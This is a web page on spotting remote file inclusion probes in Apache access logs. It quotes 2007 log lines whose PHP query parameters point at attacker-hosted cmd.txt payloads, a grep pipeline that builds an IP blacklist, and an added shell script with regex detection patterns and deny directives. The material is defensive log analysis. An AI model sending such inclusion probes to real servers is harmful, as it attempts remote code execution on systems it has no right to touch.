Softpanorama
May the source be with you, but remember the KISS principle ;-)
Recently the number of "strange" access records in the web logs jumped, and it became interesting to analyze the logs and see what those people are doing. Here is one fragment that I found manually:
213.195.77.225 - - [23/Jun/2007:06:00:07 -0700] "GET /Lang/Cilorama/c_%3Cwbr%20/%3Elanguage.shtml/str.php?lang=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 383 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:00:07 -0700] "GET /str.php?lang=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 339 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:00:08 -0700] "GET /Lang/Cilorama/c_%3Cwbr%20/str.php?lang=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 364 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:08:12 -0700] "GET /Scripting/Phprama/%3Cwbr%20/%3Ecommand_line_php.shtml/str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 393 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:08:13 -0700] "GET /str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 339 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:08:13 -0700] "GET /Scripting/Phprama/%3Cwbr%20/str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 366 "-" "libwww-perl/5.79"
66.230.197.170 - - [23/Jun/2007:06:25:53 -0700] "GET /str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 339 "-" "libwww-perl/5.805"
24.117.228.198 - - [23/Jun/2007:06:27:48 -0700] "GET /load_lang.php?_SERWEB[serwebdir]=http://dezzign.ru/echo? HTTP/1.1" 404 168 "-" "libwww-perl/5.803"
Two things are common to these records. Every request tries to pass an absolute URL (http://zarafshan.ru/uploads/cmd.txt, http://dezzign.ru/echo) as the value of a query parameter of a PHP script, which is the signature of a remote file inclusion probe: if the script includes the file named by that parameter, the attacker's code runs on the server. And every request is sent with the libwww-perl user agent, the default of a Perl LWP script. Here the server answered 406 or 404, so the probes were refused. Grepping on the libwww-perl string gives a more complete picture, reproduced in the Zombies bulletin.
Extracting the IP addresses gives you a first draft of a "blacklist", and the top dozen can be used to block those rogue addresses from accessing your site. Keep in mind that most of them are hijacked hosts rather than the attacker's own machines (the reverse DNS names below are ordinary rented servers), so such a list goes stale quickly and should be regenerated from fresh logs rather than kept permanently. To get the "dirty dozen" you can use a simple pipe, which can be made into a function or shell script (the argument is the log file; the list is written next to it with the suffix .dirty):
grep 'libwww-perl' "$1" | cut -d' ' -f1 | sort | uniq -c | sort -rn | head -n 12 > "$1.dirty"
Below are the results of processing the log from above (hit count, address, and the reverse DNS name of the address, which was looked up separately since the pipe itself prints only counts and addresses):
hits  address          reverse DNS
 20   83.149.125.174   home.w-sieci.pl
 18   80.67.20.21      mayermail.de
 12   200.69.222.122   contactar01.gestionarnet.com
 11   64.78.163.2      nickentgolf.com
 11   62.193.224.166   wpc0230.amenworld.com
 10   86.109.161.201   lincl239.ns1.couldix.com
  9   87.230.2.113     lvps87-230-2-113.dedicated.hosteurope.de
  9   85.214.55.73     mind-creations.net
  7   193.192.249.157  (no reverse DNS)
  6   87.118.96.254    ns.km22206-02.keymachine.de
  6   72.55.153.108    ip-72-55-153-108.static.privatedns.com
  6   66.147.239.104   host.1sbs.com
  6   216.246.52.59    server.dynasoft.com.ph
  6   213.195.77.225   225.77.195.213.ibercom.com
  5   217.115.197.51   node11.cluster.nxs.nl
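The following script is an added example and not part of the original page: it wraps the "dirty dozen" pipe above in a function and adds a second view that does not depend on the User-Agent string. A scanner can send any User-Agent it likes, but a remote file inclusion probe always has the same shape, an absolute URL as the value of a query parameter, so matching on that in the request line catches the same traffic even when the tool is disguised as a browser. It also pulls out the payload URLs the probes try to load, and turns a counted list into Apache 2.2 "Deny from" directives. The sample log is constructed for the example: the libwww-perl lines are copied from the fragment above, the two 192.0.2.x lines (a probe with a spoofed browser User-Agent and a normal page view) are invented. It assumes GNU grep (for -o with -E) and the Apache 2.2 access-control syntax; on Apache 2.4 the equivalent is "Require not ip".

```shell
#!/bin/sh
# Added example (not from the Softpanorama page). Sample log is constructed:
# libwww-perl lines come from the fragment above, 192.0.2.x lines are invented.
set -eu

SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
213.195.77.225 - - [23/Jun/2007:06:00:07 -0700] "GET /Lang/Cilorama/c_%3Cwbr%20/%3Elanguage.shtml/str.php?lang=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 383 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:00:07 -0700] "GET /str.php?lang=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 339 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:00:08 -0700] "GET /Lang/Cilorama/c_%3Cwbr%20/str.php?lang=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 364 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:08:12 -0700] "GET /Scripting/Phprama/%3Cwbr%20/%3Ecommand_line_php.shtml/str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 393 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:08:13 -0700] "GET /str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 339 "-" "libwww-perl/5.79"
213.195.77.225 - - [23/Jun/2007:06:08:13 -0700] "GET /Scripting/Phprama/%3Cwbr%20/str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 366 "-" "libwww-perl/5.79"
66.230.197.170 - - [23/Jun/2007:06:25:53 -0700] "GET /str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 339 "-" "libwww-perl/5.805"
24.117.228.198 - - [23/Jun/2007:06:27:48 -0700] "GET /load_lang.php?_SERWEB[serwebdir]=http://dezzign.ru/echo? HTTP/1.1" 404 168 "-" "libwww-perl/5.803"
192.0.2.10 - - [23/Jun/2007:07:01:00 -0700] "GET /str.php?lang=http://example.invalid/cmd.txt? HTTP/1.1" 406 339 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.0.2.20 - - [23/Jun/2007:07:02:00 -0700] "GET /Lang/index.shtml HTTP/1.1" 200 5120 "http://www.google.com/search?q=softpanorama" "Mozilla/5.0"
EOF

# The page's pipe as a function: top N (default 12) source addresses among
# requests sent with the libwww-perl User-Agent. Prints "count address".
dirty_dozen() {
    grep 'libwww-perl' "$1" | cut -d' ' -f1 | sort | uniq -c | sort -rn | head -n "${2:-12}"
}

# User-Agent-independent variant: match the RFI shape itself, an absolute
# URL as a query-parameter value, and only inside the request line so a
# Referer header carrying a URL does not count as a probe.
rfi_probes() {
    grep -E '"(GET|POST) [^" ]*\?[^" ]*=(https?|ftp)://' "$1" \
        | cut -d' ' -f1 | sort | uniq -c | sort -rn
}

# The remote files the probes try to include: the attacker's payload hosts,
# worth keeping next to the source addresses. Prints "count url".
rfi_payload_urls() {
    grep -oE '=(https?|ftp)://[^" ?&]+' "$1" | cut -c2- | sort | uniq -c | sort -rn
}

# Turn "count address" lines into Apache 2.2 access-control directives.
deny_list() {
    awk '{print "Deny from " $2}'
}

# Stand-alone run: the three views of the sample log plus a deny list.
echo "== top libwww-perl sources =="
dirty_dozen "$SAMPLE_LOG"
echo "== RFI probes by source, any User-Agent =="
rfi_probes "$SAMPLE_LOG"
echo "== payload URLs =="
rfi_payload_urls "$SAMPLE_LOG"
echo "== deny list =="
rfi_probes "$SAMPLE_LOG" | deny_list
```

On the sample, the User-Agent-based list misses 192.0.2.10 entirely, while the request-shape check lists it alongside the libwww-perl hosts; that is the difference between blocking a tool and blocking an attack. The payload list is the more durable indicator of the two: the source addresses rotate as zombies are cleaned or replaced, but the same cmd.txt is typically served from a small number of hosts for much longer.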
Copyright © 1996-2008 by Dr. Nikolai Bezroukov. www.softpanorama.org was created as a service to the UN Sustainable Development Networking Programme (SDNP) in the author's free time. This document is an industrial compilation designed and created exclusively for educational use and is placed under the copyright of the Open Content License (OPL). Original materials copyright belongs to the respective owners. Quotes are made for educational purposes only in compliance with the fair use doctrine.
Standard disclaimer: The statements, views and opinions presented on this web page are those of the author and are not endorsed by, nor do they necessarily reflect, the opinions of the author's present and former employers, SDNP or any other organization the author may be associated with. We do not warrant the correctness of the information provided or its fitness for any purpose.
Last modified: February 28, 2008